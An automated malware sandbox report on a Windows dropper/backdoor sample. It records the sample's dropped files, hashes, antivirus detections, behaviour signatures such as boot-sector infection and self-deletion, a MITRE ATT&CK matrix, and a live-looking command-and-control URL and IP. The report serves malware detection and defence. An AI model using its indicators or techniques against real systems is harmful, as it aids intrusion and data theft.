Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100100A0 GetLocalTime,SystemTimeToFileTime,5_2_100100A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10006BF0 Sleep,GetVersionExA,CreateThread,sprintf,5_2_10006BF0

Stealing of Sensitive Information

barindex
Queries disk data (e.g. SMART data)
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100055E0 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,Sleep,wsprintfA,malloc,htons,htons,htons,htons,htons,htons,htons,inet_addr,closesocket,closesocket,closesocket,5_2_100055E0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		1
Deobfuscate/Decode Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Bootkit		111
Process Injection		3
Obfuscated Files or Information		Security Account Manager124
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
Registry Run Keys / Startup Folder		1
Software Packing		NTDS11
Security Software Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets21
Virtualization/Sandbox Evasion		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Virtualization/Sandbox Evasion		DCSync11
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem1
Remote System Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
Process Injection		/etc/passwd and /etc/shadow1
System Network Configuration Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Bootkit		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Rundll32		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573196 Sample: otsIBG7J9b.exe Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 48 krnaver.com 2->48 50 blogx.sina.com.cn 2->50 52 blog.sina.com.cn 2->52 64 Antivirus / Scanner detection for submitted sample 2->64 66 Multi AV Scanner detection for dropped file 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 5 other signatures 2->70 9 otsIBG7J9b.exe 1 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 file5 46 C:\ufcpp.exe, PE32 9->46 dropped 16 cmd.exe 1 9->16         started        19 cmd.exe 1 12->19         started        21 cmd.exe 14->21         started        process6 signatures7 60 Uses ping.exe to sleep 16->60 62 Uses ping.exe to check the status of other devices and networks 16->62 23 ufcpp.exe 2 16->23         started        27 PING.EXE 1 16->27         started        30 conhost.exe 16->30         started        32 conhost.exe 19->32         started        34 PING.EXE 1 19->34         started        36 conhost.exe 21->36         started        38 PING.EXE 1 21->38         started        process8 dnsIp9 44 C:\agtve\yhnvs.dll, PE32 23->44 dropped 72 Antivirus detection for dropped file 23->72 74 Machine Learning detection for dropped file 23->74 76 Deletes itself after installation 23->76 40 rundll32.exe 1 14 23->40         started        58 127.0.0.1 unknown unknown 27->58 file10 signatures11 process12 dnsIp13 54 107.163.241.232, 12354, 49186, 49188 TAKE2US United States 40->54 56 blogx.sina.com.cn 202.108.0.52, 443, 49155, 49159 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN China 40->56 78 System process connects to network (likely due to code injection or exploit) 40->78 80 Found evasive API chain (may stop execution after checking mutex) 40->80 82 Contains functionality to infect the boot sector 40->82 84 2 other signatures 40->84 signatures14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
otsIBG7J9b.exe87%ReversingLabsWin32.Backdoor.Venik
otsIBG7J9b.exe100%AviraTR/Dropper.Gen
otsIBG7J9b.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\ufcpp.exe100%AviraTR/Dropper.Gen
C:\ufcpp.exe100%Joe Sandbox ML
C:\agtve\yhnvs.dll100%Joe Sandbox ML
C:\agtve\yhnvs.dll92%ReversingLabsWin32.Worm.Palevo

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.1.comhttp://192.168.100.83/a0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.php70%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpB0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.php80%Avira URL Cloudsafe
http://192.168.100.83/9.htm0%Avira URL Cloudsafe
http://192.168.100.83/9.htmhttp://192.168.100.83/F.htm%D0%Avira URL Cloudsafe
http://192.168.100.83/F.htm0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.php0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpD0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpBreadcrumbStore0%Avira URL Cloudsafe
http://www.1.com0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpJ0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpF0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpdK0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpX0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpe0%Avira URL Cloudsafe
http://107.163.24I0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phph0%Avira URL Cloudsafe
http://192.168.100.83/0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.phpr0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.php&0%Avira URL Cloudsafe
http://107.163.241.232:12354/show.php)0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
blogx.sina.com.cn
202.108.0.52
truefalse
    		high
    krnaver.com
    		unknown
    		unknowntrue
      		unknown
      blog.sina.com.cn
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://107.163.241.232:12354/show.phptrue
        • Avira URL Cloud: safe
        		unknown
        http://blog.sina.com.cn/u/5655029807false
          		high
          https://blog.sina.com.cn/u/5655029807false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://107.163.241.232:12354/show.phpBreadcrumbStorerundll32.exe, 00000005.00000003.3574466944.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://107.163.241.232:12354/show.phpDrundll32.exe, 00000005.00000002.4133737474.0000000005FBD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://blog.sina.com.cn/u/5655029807.$rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://107.163.241.232:12354/show.phpBrundll32.exe, 00000005.00000002.4132279546.000000000321D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://107.163.241.232:12354/show.php7rundll32.exe, 00000005.00000003.3574466944.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://blog.sina.com.cn/4rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://107.163.241.232:12354/show.php8rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://blog.sina.com.cn/u/5655029807Trundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.1.comhttp://192.168.100.83/aotsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.168.100.83/9.htmufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://blog.sina.com.cn/u/5655029807z7rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://blog.sina.com.cn/u/5655029807.rundll32.exe, 00000005.00000002.4133633291.0000000005EAD000.00000004.00000010.00020000.00000000.sdmpfalse
                      		high
                      http://192.168.100.83/F.htmotsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://blog.sina.com.cn/u/%srundll32.exe, rundll32.exe, 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpfalse
                        		high
                        http://192.168.100.83/9.htmhttp://192.168.100.83/F.htm%DotsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.1.comotsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://107.163.241.232:12354/show.phpFrundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://blog.sina.com.cn/u/5655029807arundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://107.163.241.232:12354/show.phpJrundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://blog.sina.com.cn/u/5655029807zhrundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://blog.sina.com.cn/u/5655029807zrundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://blog.sina.com.cn/u/5655029807zdrundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://107.163.241.232:12354/show.phpXrundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://blog.sina.com.cn/u/56550298074rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://blog.sina.com.cn/u/5655029807licationrundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://107.163.241.232:12354/show.phpdKrundll32.exe, 00000005.00000003.3574466944.0000000005FC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133737474.0000000005FBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rzrundll32.exe, 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpfalse
                                      		high
                                      http://107.163.24Irundll32.exe, 00000005.00000002.4133153570.000000000537C000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133198288.00000000053FD000.00000004.00000010.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://192.168.100.83/otsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://107.163.241.232:12354/show.phprrundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://blog.sina.com.cn/u/5655029807Hrundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://107.163.241.232:12354/show.phphrundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://blog.sina.com.cn/u/5655029807Srundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://107.163.241.232:12354/show.phperundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://blog.sina.com.cn/u/5655029807&Krundll32.exe, 00000005.00000003.3574466944.0000000005FC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133737474.0000000005FBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://107.163.241.232:12354/show.php&rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://107.163.241.232:12354/show.php)rundll32.exe, 00000005.00000002.4133153570.000000000537C000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133198288.00000000053FD000.00000004.00000010.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://blog.sina.com.cn/rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              202.108.0.52
                                              		blogx.sina.com.cnChina
                                              		4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                              107.163.241.232
                                              		unknownUnited States
                                              		20248TAKE2UStrue

                                              Private

                                              IP
                                              127.0.0.1

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1573196
                                              Start date and time:2024-12-11 16:23:33 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 37s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:18
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:otsIBG7J9b.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:04cc92b4e0f79ba841ba3c76651c8968d6525d4805829dd875f7a34034ffa460.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@22/3@52/3
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 64
                                              • Number of non-executed functions: 68
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target rundll32.exe, PID 3384 because there are no executed function
                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtOpenFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: otsIBG7J9b.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:24:30API Interceptor519746x Sleep call for process: rundll32.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              202.108.0.52VqCbf9fhnQ.exeGet hashmaliciousUnknownBrowse
                                              • blog.sina.com.cn/u/5655029807
                                              k4F4uRTZZR.dllGet hashmaliciousUnknownBrowse
                                              • blog.sina.com.cn/u/5655029807
                                              5jme4p7u76.exeGet hashmaliciousUnknownBrowse
                                              • blog.sina.com.cn/u/5655029807

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              blogx.sina.com.cn08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              b3sV534MMf.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              NaRZIOq3O8.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              33twe7X26S.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              MYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              81mieek02V.dllGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CHINA169-BJChinaUnicomBeijingProvinceNetworkCNXgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                              • 123.121.0.198
                                              Josho.mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 124.192.197.161
                                              Josho.mips.elfGet hashmaliciousUnknownBrowse
                                              • 114.67.239.168
                                              hax.x86.elfGet hashmaliciousMiraiBrowse
                                              • 221.222.118.76
                                              hax.ppc.elfGet hashmaliciousMiraiBrowse
                                              • 140.210.138.192
                                              .5r3fqt67ew531has4231.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                              • 103.135.163.78
                                              rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 122.113.109.82
                                              rebirth.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 123.126.198.111
                                              rebirth.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 116.218.224.190
                                              TAKE2USXgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                              • 107.163.241.204
                                              08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.56.110
                                              PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.56.110
                                              jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.56.110
                                              b3sV534MMf.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.56.110
                                              NaRZIOq3O8.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.241.193
                                              33twe7X26S.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.241.193
                                              MYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.56.110
                                              JwLT3elUtn.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.43.161
                                              yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                              • 107.163.56.240

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              37f463bf4616ecd445d4a1937da06e19XgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                              • 202.108.0.52
                                              nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                              • 202.108.0.52
                                              CcIlKT6XdC.exeGet hashmaliciousAmadey, PureLog Stealer, Stealc, VidarBrowse
                                              • 202.108.0.52
                                              PO_11100011211.Vbs.vbsGet hashmaliciousFormBookBrowse
                                              • 202.108.0.52
                                              Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 202.108.0.52
                                              DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 202.108.0.52
                                              Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              • 202.108.0.52
                                              LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                              • 202.108.0.52
                                              SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                              • 202.108.0.52
                                              http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                              • 202.108.0.52

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\1.txt

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:ISO-8859 text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):2146
                                              Entropy (8bit):4.33510205859581
                                              Encrypted:false
                                              SSDEEP:24:8DXwher+V3MLAYBnaezjezYL4KCQRajERJEennyL/IXdI+Bbq7f/GdSNNUP7wzGb:sLdojGSbGLbg6
                                              MD5:DE59D93CCD3DA4C52AD1F9CA43522D93
                                              SHA1:AD07ACCBDF663ABC37B720376473FEE741B42EDE
                                              SHA-256:1BE0A5BC5909E52ADEDEF33180FD96750367C7F57A6919BFE10481D1B68BF3D7
                                              SHA-512:E00BB020C2AAE3C53CC05551E1687AB20A8DE67047F358332CBF7B345B6F180898BB91681D70318CE77E2CF437BF2D17A63E7405CD781403C6D48291FDC42D39
                                              Malicious:false
                                              Preview:..2024-12-11 13:36..iOffset....2024-12-11 17:04..iOffset....2024-12-11 20:11..iOffset....2024-12-11 23:38..iOffset....2024-12-12 01:49..iOffset....2024-12-12 05:17..iOffset....2024-12-12 08:50..iOffset....2024-12-12 10:33..iOffset....2024-12-12 15:22..iOffset....2024-12-12 17:33..iOffset....2024-12-12 21:17..iOffset....2024-12-12 23:00..iOffset....2024-12-13 03:14..iOffset....2024-12-13 08:39..iOffset....2024-12-13 13:04..iOffset....2024-12-13 18:14..iOffset....2024-12-14 00:22..iOffset....2024-12-14 07:20..iOffset....2024-12-14 19:10..iOffset....2024-12-15 01:33..iOffset....2024-12-15 19:58..iOffset....2024-12-16 04:29..iOffset....2024-12-16 16:59..iOffset....2024-12-17 14:57..iOffset....2024-12-18 00:58..iOffset....2024-12-18 11:10..iOffset....2024-12-18 20:06..iOffset....2025-05-06 23:00..iOffset....2025-09-05 04:25..iOffset....2025-09-27 15:12..iOffset....2025-10-17 18:52..iOffset....2025-11-09 15:01..iOffset....2025-12-15 13:52..iOffset....2026-02-02 16:22..iOffset....2026-03-11 0

                                              C:\agtve\yhnvs.dll

                                              Download File
                                              Process:C:\ufcpp.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):43464
                                              Entropy (8bit):7.908920555883916
                                              Encrypted:false
                                              SSDEEP:768:t0inj1jJ5OeUMhBNSqHvMjjAipMkuG30sv2xEZkWldADAKPIp:t0ipV5uMhBt0jjAiusv22ZkWTOAKP8
                                              MD5:36E3FB5964D663272CF1169E1E1CA478
                                              SHA1:58115E08B49505BCBBB5C88A28A86222BA18D5D4
                                              SHA-256:C7C41689DE030DF0F78F471422FA2A6383B36E77C94E7F6F124A96FEB3E27ED7
                                              SHA-512:DAFF53B11AA400437A06287707A334A09661C1EF7D0FD8BEAF1A874C79C16FE45BD1188343D0623E839D3EAD5EA2DD90896E37CCF3B252C7220C74989A9BA442
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 92%
                                              Preview:MZ@.....................@.............!.L.!packed by nspack$@...PE..L...u..U...........!................................................................................................. ..8.......x............................ ...............................................................K......................nsp0................................`...nsp1...............................`...............D.................................................... .......K.......................text..................................................UBome........0..........UBome........H...X.................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................z.......z.?.................................S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.E.4...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....P.a.g.e. .M.a.n.a.g.e.m.e.n.t. .M.o.d.u.l.e. .f.o.r. .S.c.a.n.S.o.f.t. .S.D.K...>.....F.i.l.e.V.e.r.s.i.o.n.....1.4...0...4.7.3.0...

                                              C:\ufcpp.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\otsIBG7J9b.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):72438
                                              Entropy (8bit):7.005065563083021
                                              Encrypted:false
                                              SSDEEP:768:qGHV45EDE477AZbUJx0rZGE3jCELoiMMj6hZ3nE+EXVmkDbjRL8Khc15Z6J1Sb:qG14P477AxUYrZGoC09k0SkTRHhWqPO
                                              MD5:1B4C7D94BCF61F9CCE0B29C2D879EE73
                                              SHA1:C393499F2BE86711B11CA50F74EAE4E88F7690A7
                                              SHA-256:D8DFA5523D81ED408E22E11823412EF164E28F757CFC1C49E7811CE1C849959D
                                              SHA-512:4266BEFB42A4A0918B92C4F97027062D8F4606FAB8513A254CD4DE5764058E3C946766E3C4C0860A9F5641A9B9D15E52BE9AB1E8EB671E23935CD0F1E2B516AD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
